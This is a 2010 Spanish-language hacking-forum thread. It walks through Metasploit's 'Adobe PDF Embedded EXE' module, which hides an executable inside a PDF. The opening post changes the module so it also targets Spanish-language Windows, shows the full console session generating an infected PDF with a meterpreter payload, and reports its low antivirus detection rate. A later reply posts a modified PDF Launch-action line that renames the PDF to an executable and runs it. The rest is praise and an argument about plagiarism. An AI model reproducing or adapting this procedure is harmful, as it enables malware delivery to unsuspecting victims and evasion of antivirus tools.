elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF  (Leído 13,614 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
[Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« en: 8 Abril 2010, 07:18 am »

Incrustar ejecutable dentro de un archivo de Adobe PDF

[Metasploit By: Shell Root]

Retomando un poco lo que es la herramienta 'Metasploit', encontré un exploit donde podemos realizar una incrustación de un archivo ejecutable dentro de un archivo de Adobe PDF.

Descripción del Exploit
Ubicación:/windows/fileformat/adobe_pdf_embedded_exe
Nombre:Adobe PDF Embedded EXE Social Engineering
Versión:0
Plataforma:Windows
Licencia:Metasploit Framework License (BSD)
Rango:Excelente
Proporciando por:Colin Ames <amesc@attackresearch.com>
Objetivos disponibles:Adobe Reader v8.x, v9.x (Windows XP SP3 English)
Descripción:Este módulo del Metasploit incorpora una carga de un archivo PDF existente.

Como podemos ver, el exploit, solo funciona con sistema operativo windows xp en ingles (Windows XP ... English), pero aquí lo haremos portable a un windows en español, ya que es él que nos interesa.

Después de esta breve definición del exploit, vamos a ver como funciona este exploit, primero que todo, para que nos funcione dentro de un sistema operativo windows xp en español, vamos a la linea 232 del exploit, donde reemplazamos este código:
Código
  1. 232. dirs = [ "Desktop", "My Documents", "Documents" ]
por este:
Código
  1. 232. dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos"]
Como vemos de añadimos algunos parámetros necesarios para que nuestro exploit corra en un windows en ingles como también en un windows en español. Después de realizar esto, vamos a generar nuestro PoC!

Abrimos la consola del Metasploit, seleccionamos el exploit, y le ingresamos los parámetros necesarios y lo lanzamos. Inmediatamente se creara el PoC con el archivo pdf "infectado".
Código:
root@bt:/opt/metasploit3/msf3# msfconsole

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 540 exploits - 256 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
       =[ svn r9040 updated today (2010.04.07)

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   EXENAME                       no        The Name of payload exe.
   FILENAME    evil.pdf          no        The output filename.
   INFILENAME                    yes       The Input PDF filename.
   OUTPUTPATH  ./data/exploits/  no        The location to output the file.


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME PoC_PDF_EXE.pdf
FILENAME => PoC_PDF_EXE.pdf
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /root/cmd.exe
EXENAME => /root/cmd.exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/PoC_PDF_EXE_File.pdf
INFILENAME => /root/PoC_PDF_EXE_File.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started bind handler

[*] Reading in '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing Successful.
[*] Using '/root/cmd.exe' as payload...
[*] Creating 'PoC_PDF_EXE.pdf' file...
[*] Generated output file /root/PoC_PDF_EXE.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) > 

PD: El exploit trabaja con un payload de por medio, como vieron solo seleccione el payload bind_tcp, ya que no surge ningun efecto a la hora de ejecutar el PoC. Esto si seria necesario a la hora de ejecutar un payload convertido en ejecutable.

Nos genero el archivo PDF correctamente, ahora miremos nuestro PoC en acción.



Miremos que nos dice el Scanner de NoVirusThanks:
Citar
File Info

Report date: 2010-04-08 07:14:17 (GMT 1)
File name: PoC_PDF_EXE.pdf
File size: 1698671 bytes
MD5 Hash: 23d92e4f9b132150d002d014eb772529
SHA1 Hash: 20f0caceffefa8958ffa7638657393ae2d34e3c1
Detection rate: 2 on 20 (10%)
Status: INFECTED

Detections

a-squared - -
Avast - JS:Pdfka-XN [Expl]
AVG - -
Avira AntiVir - -
BitDefender - Exploit.PDF-Dropper.Gen
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
Zoner - -

Scan report generated by NoVirusThanks.org

Fuente: http://shellrootsecurity.blogspot.com/2010/04/metasploit-incrustar-ejecutable-dentro.html
En línea

Te vendería mi talento por poder dormir tranquilo.
darko666

Desconectado Desconectado

Mensajes: 39


Ver Perfil
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #1 en: 8 Abril 2010, 14:27 pm »

Buenísima la modificación para que funcione en un spanish!!
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #2 en: 8 Abril 2010, 21:53 pm »

Como siempre, bestial de lo mejorcito.

Saludos
En línea

laideker

Desconectado Desconectado

Mensajes: 68


09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0


Ver Perfil WWW
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #3 en: 8 Abril 2010, 23:09 pm »

buen aporte  :rolleyes: :rolleyes: ;-)
En línea

MasterPM2


Desconectado Desconectado

Mensajes: 425


,.-~´¨¯¨`·~-.¸--$4(_Må§të®-Þåølø™_)-$-,.-~´¨¯¨`·~-


Ver Perfil
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #4 en: 12 Abril 2010, 08:15 am »

disculpen mi ingnorancia, pues comienzo a usarlo...
pero...
como llego a esa linea de xploit?


sl2..

buenisismo el tuto..
En línea

ANBU暗部   Ansatsu Senjutsu Tokushu Butai暗殺戦術特殊部隊 Fuerza militar especial táctica de eliminación........MyDarker Sid3

<firma retirada, no la vuelvas a poner o se te sancionara>  <- - Amenazas
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #5 en: 12 Abril 2010, 19:25 pm »

Emmm dentro de la carpeta /opt/metasploit3/msf3/modules/exploits/windows/fileformat/, buscas el archivo adobe_pdf_embedded_exe.rb

PD: Identifica la diferencia entre Exploit y Xploit.
En línea

Te vendería mi talento por poder dormir tranquilo.
toxeek
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.637


Ver Perfil
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #6 en: 12 Abril 2010, 19:42 pm »


http://kungfoosion.blogspot.com/2010/02/embebiendo-un-ejecutable-dentro-de-un.html

 :¬¬
En línea

"La envidia es una declaración de inferioridad"
Napoleón.
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #7 en: 12 Abril 2010, 19:54 pm »

Ahora dirás que es un Copy/Paste?

Nueva linea a modificar 97
Código
  1. output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C (if exist \"%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\My Documents\"))&(if exist \"%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Desktop\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"My Documents\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Desktop))&&(ren #{pdf_name}.pdf #{pdf_name}.exe&start #{pdf_name}.exe))>>>>\rendobj\r"
« Última modificación: 12 Abril 2010, 19:58 pm por Alex@ShellRoot » En línea

Te vendería mi talento por poder dormir tranquilo.
toxeek
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.637


Ver Perfil
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #8 en: 12 Abril 2010, 20:13 pm »


Nio digo que sea un Copy and Paste.

Ahora, se mas prudente y no saques mucho pecho despues de lo que hicistes.
Se de sobra que usas fuentes externas para elaborar tus tutoriales; no vendria nada mal si las pusieras.

Saludos.
En línea

"La envidia es una declaración de inferioridad"
Napoleón.
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF
« Respuesta #9 en: 12 Abril 2010, 22:03 pm »

jejejejje?  :P
En línea

Te vendería mi talento por poder dormir tranquilo.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines